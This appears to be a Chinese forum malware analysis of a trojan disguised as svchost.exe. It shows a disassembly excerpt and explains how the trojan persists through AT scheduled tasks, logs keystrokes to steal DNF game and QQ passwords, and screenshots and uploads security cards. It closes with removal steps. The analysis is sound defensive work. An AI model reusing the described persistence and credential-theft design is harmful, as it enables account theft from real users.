00411B87 . 8D4D B4 lea ecx,dword ptr ss:[ebp-4C]
00411B8A . FF15 10F04100 call dword ptr ds:[<&msvbvm60.__vbaFre>; msvbvm60.__vbaFreeVar
00411B90 . 8B45 D4 mov eax,dword ptr ss:[ebp-2C]
00411B93 . 53 push ebx
00411B94 . 68 3C5C4000 push svchost.00405C3C ; hwnd
00411B99 . 8D4D C4 lea ecx,dword ptr ss:[ebp-3C]
00411B9C . 50 push eax
00411B9D . 51 push ecx
00411B9E . FFD7 call edi
00411BA0 . 83C4 10 add esp,10
00411BA3 . 8D55 C4 lea edx,dword ptr ss:[ebp-3C]
00411BA6 . 68 4C5C4000 push svchost.00405C4C ; Internet Explorer_Server
00411BAB . 52 push edx
00411BAC . FF15 C0F14100 call dword ptr ds:[<&msvbvm60.__vbaI4V>; msvbvm60.__vbaI4Var
00411BB2 . 50 push eax
00411BB3 . E8 E8030000 call svchost.00411FA0
00411BB8 . 8D4D C4 lea ecx,dword ptr ss:[ebp-3C]
00411BBB . 8945 E8 mov dword ptr ss:[ebp-18],eax
00411BBE . FF15 10F04100 call dword ptr ds:[<&msvbvm60.__vbaFre>; msvbvm60.__vbaFreeVar
00411BC4 . 8B45 D4 mov eax,dword ptr ss:[ebp-2C]
00411BC7 . 53 push ebx
00411BC8 . 68 9C5C4000 push svchost.00405C9C ; focus
00411BCD . 53 push ebx
00411BCE . 68 885C4000 push svchost.00405C88 ; fileField
00411BD3 . 53 push ebx
00411BD4 . 68 805C4000 push svchost.00405C80 ; All
00411BD9 . 53 push ebx
00411BDA . 68 1C5C4000 push svchost.00405C1C ; Document
总结:
1.获取系统目录(C:\WINDOWS\system32),在其下创建 Pusmint 目录,把自身复制为 Pusmint\svchost.exe,然后运行它。
2.写出 Pusmint\SystemDir.bat,用 AT 命令注册每半小时一条、共 48 条的计划任务,在指定时间以 /interactive 方式运行木马,实现开机后持续驻留。
3.结束自身。
4.复制后的程序通过 FindWindowA / GetForegroundWindow / GetWindowTextA / GetClassNameA 查找窗口,用 CreateToolhelp32Snapshot / Process32First / Process32Next 枚举进程,定位游戏(dnf.exe)和 QQLOGIN.EXE 的窗口,再结合 GetKeyState / MapVirtualKeyA 读取按键,从而截取输入的密码。
5.至于密保卡,则是用 GDI+(GdipSaveImageToFile)把屏幕截图保存为 Pusmint\jietu.jpg,然后疑似通过 IE 控件(Internet Explorer_Server 窗口,操作 Document / fileField)以网页表单把图片上传到指定地址。
由于本人能力有限,错误及遗漏在所难免! 或许原理并没有这么简单,还请其他高手作出指点. 万分感谢!
查杀方法:
首先用 XueTr.exe 结束木马进程(不结束怎么删除哈)。注意只结束路径为 C:\WINDOWS\system32\Pusmint\svchost.exe 的那个,不要误杀系统自带的 C:\WINDOWS\system32\svchost.exe——按进程路径区分即可。然后
到 C:\WINDOWS\system32\Pusmint 目录删除其中所有文件(svchost.exe、SystemDir.bat、jietu.jpg 等),并删除该目录。
然后运行 XueTr.exe 切换到启动项就明朗了,直接 delete *.JOB 的项目(也可以在命令行执行 at /delete 清掉全部 AT 任务)。
最后,由于密码和密保截图可能已经被发出去,清理完成后记得修改游戏账号和 QQ 的密码、密保。